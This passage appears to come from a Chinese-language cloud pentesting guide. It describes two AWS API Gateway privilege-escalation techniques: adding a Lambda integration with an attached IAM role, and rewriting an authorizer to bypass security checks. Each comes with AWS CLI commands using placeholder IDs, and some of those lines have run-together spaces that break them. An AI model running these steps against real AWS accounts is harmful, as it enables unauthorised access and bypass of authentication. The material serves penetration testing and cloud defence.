具有 apigateway:PutIntegration、apigateway:CreateDeployment 和 iam:PassRole 权限的攻击者可以 向现有的 API Gateway REST API 添加一个带有附加 IAM 角色的 Lambda 函数的新集成。攻击者可以 触发 Lambda 函数以执行任意代码,并可能获得与 IAM 角色相关联的资源的访问权限。
API_ID="your-api-id"RESOURCE_ID="your-resource-id"HTTP_METHOD="GET"LAMBDA_FUNCTION_ARN="arn:aws:lambda:region:account-id:function:function-name"LAMBDA_ROLE_ARN="arn:aws:iam::account-id:role/lambda-role"# Add a new integration to the API Gateway REST APIaws apigateway put-integration --rest-api-id $API_ID --resource-id $RESOURCE_ID --http-method $HTTP_METHOD --type AWS_PROXY --integration-http-method POST --uri arn:aws:apigateway:region:lambda:path/2015-03-31/functions/$LAMBDA_FUNCTION_ARN/invocations --credentials $LAMBDA_ROLE_ARN
# Create a deployment for the updated API Gateway REST APIawsapigatewaycreate-deployment--rest-api-id $API_ID --stage-nameProd
拥有 apigateway:UpdateAuthorizer 和 apigateway:CreateDeployment 权限的攻击者可以修改现有的 API Gateway 授权者以绕过安全检查或在进行 API 请求时执行任意代码。
API_ID="your-api-id"AUTHORIZER_ID="your-authorizer-id"LAMBDA_FUNCTION_ARN="arn:aws:lambda:region:account-id:function:function-name"# Update the API Gateway authorizeraws apigateway update-authorizer --rest-api-id $API_ID --authorizer-id $AUTHORIZER_ID --authorizer-uri arn:aws:apigateway:region:lambda:path/2015-03-31/functions/$LAMBDA_FUNCTION_ARN/invocations
# Create a deployment for the updated API Gateway REST APIawsapigatewaycreate-deployment--rest-api-id $API_ID --stage-nameProd
